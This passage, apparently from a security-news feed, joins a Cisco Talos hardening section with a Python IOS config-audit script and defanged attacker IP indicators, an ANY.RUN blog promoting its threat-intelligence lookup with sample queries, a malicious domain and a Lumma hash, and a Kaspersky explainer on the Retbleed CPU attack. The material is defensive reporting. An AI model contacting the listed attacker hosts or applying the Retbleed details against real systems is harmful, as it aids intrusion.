    • Store configurations centrally and push to devices. Do NOT allow devices to be the trusted source of truth for their configurations.
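An added example, not Cisco's or Talos's code, of auditing a running-config against several of the measures above: ssh-only VTY lines with “transport output none”, “no vstack”, Type 8 local credentials, Type 6 TACACS+ keys, and no SNMPv1/v2c communities. Both config excerpts are constructed, and the check for Smart Install assumes that “no vstack” appears in the config only once the service has been disabled (noted in the code).

```python
import re

# Constructed IOS running-config excerpts (not from the report): the weak settings the measures above call out, and the corrected form.
WEAK_CONFIG = """\
hostname edge-rtr1
username admin secret 5 $1$placeholder$hash
snmp-server community public RO
tacacs server isegw
 key 7 094F471A1A0A
line vty 0 4
 transport input telnet ssh
"""

HARDENED_CONFIG = """\
hostname edge-rtr1
no vstack
username admin secret 8 $8$placeholder$hash
snmp-server group netops v3 priv
tacacs server isegw
 key 6 placeholder-type6-blob
line vty 0 4
 transport input ssh
 transport output none
"""

def stanzas(config):
    """Group each top-level command with its subcommands (IOS indents them by one space)."""
    groups = []
    for line in config.splitlines():
        if line.startswith(" ") and groups:
            groups[-1][1].append(line.strip())
        else:
            groups.append((line.strip(), []))
    return groups

def audit(config):
    """Return finding strings for deviations from the hardening measures; [] if clean."""
    findings = []
    # Assumption: 'no vstack' is present in the config only once Smart Install is disabled.
    if "no vstack" not in config.splitlines():
        findings.append("Smart Install not disabled (expected 'no vstack')")
    for cmd, body in stanzas(config):
        m = re.match(r"username\s+(\S+)\s+(?:secret|password)\s+(\d)\b", cmd)
        if m and m.group(2) != "8":
            findings.append(f"user {m.group(1)}: type {m.group(2)} credential, expected type 8")
        if cmd.startswith("snmp-server community "):
            findings.append("SNMP v1/v2c community configured, expected SNMPv3")
        if cmd.startswith("tacacs server ") and not any(re.match(r"key\s+6\s", s) for s in body):
            findings.append(f"{cmd}: TACACS+ key is not type 6")
        if cmd.startswith("line vty "):
            if "transport input ssh" not in body:
                findings.append(f"{cmd}: transport input is not ssh-only")
            if "transport output none" not in body:
                findings.append(f"{cmd}: transport output not set to none")
    return findings
```

Run against a configuration pulled from the central store (not from the device, per the last measure above), the weak excerpt yields six findings and the hardened one none.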

Indicators of compromise (IOCs)

Indicator          Type        Known Activity
185.141.24[.]222   IP Address  2023/03/23
185.82.202[.]34    IP Address  2025/01/15 – 2025/02/28
185.141.24[.]28    IP Address  2024/10/01 – 2025/07/03
185.82.200[.]181   IP Address  2024/10/01 – 2024/11/15

Cisco Talos Blog – Read More

How to Enrich IOCs with Actionable Threat Context: Tips for SOC Analysts 

One solution can change everything. ANY.RUN’s Threat Intelligence Lookup is living proof of that. 

By delivering a browsable source of threat data, it helps your SOC overcome the obstacles that stand between it and higher detection rates and smarter security decisions. 

Find details on how to make the most of TI Lookup below. 

Threat Intelligence Lookup: Context for Fatigue-Free Investigations 

Main page of TI Lookup with statistics and MITRE ATT&CK Matrix 

ANY.RUN develops essential solutions for SOCs, such as Threat Intelligence Lookup—a searchable database of threat data. Its goal is to bridge the threat intelligence gap for malware analysts by enriching indicators with actionable context. 

TI Lookup makes it possible by providing swift access to data collected from millions of malware analyses done in ANY.RUN sandbox by experts who work for 15,000 companies all over the world. This lets you add context to your indicators and tap into this fresh, actionable data on attacks that just happened. The best part is—it’s available at no cost. 

The free version of TI Lookup gives you access to the 20 most recent sandbox analyses per query, unlocks key search fields (file hashes, URLs, domains, IPs, MITRE ATT&CK techniques, Suricata IDs, etc.), and makes it possible to create compound searches. 

For free, you can achieve: 

  • Enriched Threat Investigations: Gain deeper insight into threats by connecting existing artifacts with real-world attacks. 
  • Accelerated Response: Reduce MTTR by quickly understanding threat behavior, objectives, and targets through sandbox analysis. 
  • Stronger Proactive Defense: Gather intelligence on emerging threats to act before they cause damage. 
  • Enhanced Team Expertise: Empower SOC analysts to study real-world attacks and adversary TTPs in live malware using the interactive MITRE ATT&CK matrix. 
  • Improved Detection Rules: Leverage intelligence from TI Lookup to refine SIEM, IDS/IPS, and EDR rules for stronger proactive defense. 

Use Cases of TI Lookup’s Free Version 

Register in TI Lookup for free, and you’ll be able to access actionable threat insights right away. Apply them in scenarios like these: 

Enriching Network Indicators with Context 

A practical example: you need to verify a domain to see if it’s tied to any malicious activities, and if yes, gain more info on it.  

Enter it into TI Lookup and you’ll instantly see the result. The following domain, for instance, turned out to be malicious: 

domainName:"technologyenterdo.shop" 

TI Lookup’s conclusion on the query 

With a free plan, you can access up to 20 recent analysis sessions that involve it to enrich the indicator with reliable context. In addition to domains, the same can be done for IPs and URLs, also for free. 

TI Lookup’s Premium plan would allow you to see even more information. For example, the domain above is labeled with a “malconf” tag. This means that it was retrieved from the very heart of a malicious sample, the malware configuration, by ANY.RUN’s experts. Indicators from configs offer trustworthy, valuable insights into the malware’s behavior and impact. 

Premium plan gives you more details, such as info on domains 

Exploring New Threat Samples 

Since around 73% of attacks start with phishing, SOC teams should stay on the lookout for fresh threat samples that could harm their organization. One thing you can do is to monitor current TTPs in TI Lookup. 

To narrow down your search, you can keep track of threats submitted by analysts from your country. For example, the following query will help you browse Tycoon threats detected in Germany: 

threatName:"tycoon" AND submissionCountry:"de" 

Search results for Tycoon threats submitted in Germany 

From there, you can collect indicators from search results and create or update your detection rules in order to stay ahead of potential threats. 

TI Lookup shares links to relevant ANY.RUN sandbox sessions like this one 

Checking File Hashes 

Another essential use case of TI Lookup is performing a quick check for an indicator. Let’s see if this hash is connected to any threats: 

sha256:"a78cdb5cf41aa777d9fb082e094f7a8b9e73d0b31d8358db3a58a5ba8ae42ca5" 

The verdict: it’s associated with Lumma. One simple query, and you’ve received a trustworthy result based on actual threat investigations by other analysts. 

Results of looking up hash from query above 

Tracking Threats by TTPs 

ANY.RUN also provides access to the interactive MITRE ATT&CK matrix that shows you real-world examples of threats active today. With it, you can learn about different TTPs recently used by threat actors and see how they look in action via ANY.RUN’s Interactive Sandbox. 

For that, go to TI Lookup and click any TTP to dig deeper. For example, here are some of the results for T1068: Exploitation for Privilege Escalation: 

Access further info on Tactics, Techniques, and Procedures 

You see the description for this TTP and links to malicious samples that involve it. Click any analysis session to see the full detonation and retrieve indicators. 

Transforming Your SOC for Proactive Security 

TI Lookup’s free version gives you more than just a glimpse into threat intelligence. As we’ve shown above, it can be a powerful solution to a number of SOC challenges. 

The Premium plan, however, gives you even more. It’s an enterprise-grade product, helping businesses across infrastructures: 

  • Speed Up and Automate Detection: Correlate alerts against a vast database of IOCs, IOBs, and IOAs, and integrate TI Lookup with your SIEM, TIP, or SOAR systems for real-time monitoring.
  • Hunt and Investigate with Depth and Precision: Create and search custom YARA rules in ANY.RUN’s database and refine investigations with 40+ parameters and advanced operators. 
  • Stay Proactive and Informed: Set automated alerts for specific IOCs or patterns, and leverage TI Reports from expert analysts to track evolving malware trends across industries. 

Among Premium features are Query Updates. They automate the process of indicator enrichment by keeping you subscribed to threats and indicators of interest. Enter any query, such as: 

threatName:"remcos" AND domainName:"" 

Results of the query in TI Lookup Premium 

Click the bell icon, and you’ll start receiving fresh data on new samples that fit your query. As you can see, there are plenty: 

Subscribe to the query using the button in the top right corner to stay ahead 

Another way to deepen your investigation is to browse Indicators of Behavior (IOBs). This allows you to research attacks using minor artefacts like a suspicious fragment of a command line. Type it in like so: 

commandLine:"$codigo" 

As a result, you’ll find out that this command line is actually related to AsyncRAT’s steganography attacks:

TI Lookup returns over 400 analyses of malicious samples associated with this command line  

About ANY.RUN 

Trusted by more than 500,000 security professionals and 15,000+ organizations across industries like finance, healthcare, and manufacturing, ANY.RUN empowers teams to investigate malware and phishing threats with speed and accuracy. 

With ANY.RUN’s Interactive Sandbox, you can safely analyze suspicious files and URLs, observe live behavior, and extract key insights to dramatically reduce triage and decision-making time. 

Tap into Threat Intelligence Lookup and TI Feeds to uncover IOCs, attacker tactics, and behavioral patterns linked to real-world threats for staying one step ahead of evolving attacks. 

Experience ANY.RUN’s solutions firsthand to enhance your SOC workflow via a trial period 

The post How to Enrich IOCs with Actionable Threat Context: Tips for SOC Analysts appeared first on ANY.RUN’s Cybersecurity Blog.

ANY.RUN’s Cybersecurity Blog – Read More

Retbleed exploitation in realistic setting | Kaspersky official blog

In a new paper, Google researchers Matteo Rizzo and Andy Nguyen have detailed an improved Retbleed attack scenario. As we’ve explained in a previous post, the original Retbleed attack exploited vulnerabilities in AMD’s Zen and Zen 2, as well as Intel’s Kaby Lake and Coffee Lake CPUs. Hardware vulnerabilities of this kind are extremely difficult to exploit in realistic settings, which is why the various forms of Spectre and derivative attacks like Retbleed have remained largely theoretical. Despite this, both CPU manufacturers and software developers have implemented methods to mitigate them. The essence of the new Google research is to demonstrate how the effectiveness of the Retbleed attack can be increased. Without fundamentally changing the attack’s architecture, they were able to leverage features of AMD Zen 2 CPUs to read arbitrary data from RAM.

Retbleed in a nutshell

Like Spectre, Retbleed exploits a feature called branch prediction in a computer’s CPU. Branch prediction allows the processor to speculatively execute instructions without waiting for the results of previous computations. Sometimes such predictions are wrong, but normally this only results in a slight, imperceptible slowdown in the application’s performance.

In 2018, the Spectre attack showed that incorrect predictions can be used to steal secrets. This is possible due to two key characteristics. First, the branch prediction system can be trained to access a memory area containing secret data, which then gets loaded into the CPU cache. Second, a way was found to extract this secret data from the cache through a side channel by measuring the execution time of a specific instruction.

Retbleed can be considered an evolution of the Spectre v2 attack: it also exploits the characteristics of the branch prediction system, but differs in how it injects instructions. What’s more, Retbleed can bypass the technology used to protect against Spectre v2, and therefore threatens systems running on more modern hardware. Retbleed remains difficult to implement. A demonstration in ideal conditions by the authors of the original research took a full 90 minutes to extract the secret (in that case a user password).

What the Google researchers accomplished

The researchers from Google were able to significantly accelerate a Retbleed attack. The key takeaway from their work is that arbitrary regions of RAM can be read at 13 KB/s. The accuracy of extracting secret data from the cache is also crucial for such attacks, and in this case it was one hundred percent. The experts demonstrated how the security systems of the operating system kernel – specifically the Linux kernel – can be bypassed. Another significant improvement they made was the use of an attack known as Speculative ROP, which they modified to evade the very same defenses designed for Spectre v2.

According to the researchers, the only limitation of their exploit is the need to know the system’s kernel configuration in advance. This isn’t a major hurdle because many systems use common, standard configurations. Even for unknown configurations, attackers can perform a preliminary analysis.

Should we expect Retbleed attacks in the wild?

Most such attacks explore a scenario where malicious code with low privileges runs on a standard computer – ultimately gaining access to sensitive data. However, the same could be said of attacks using traditional malware. If an attacker has already managed to execute arbitrary code on a system, they don’t necessarily need to resort to extremely complex methods for privilege escalation. There are often simpler ways to achieve the same result, such as exploiting a vulnerability in an application or system software.

Attacks like Spectre and Retbleed pose the greatest danger to cloud systems. For a cloud provider, it’s critically important that clients whose virtual machines share the same hardware can’t gain access to other users’ data or hypervisor information. Google’s researchers claim that this new variant of the Retbleed attack allows for exactly that. As a result, Google has stopped using servers with AMD Zen 2 architecture CPUs in its own cloud services for tasks that involve clients executing arbitrary code. So it does seem they’re taking this threat seriously.

Kaspersky official blog – Read More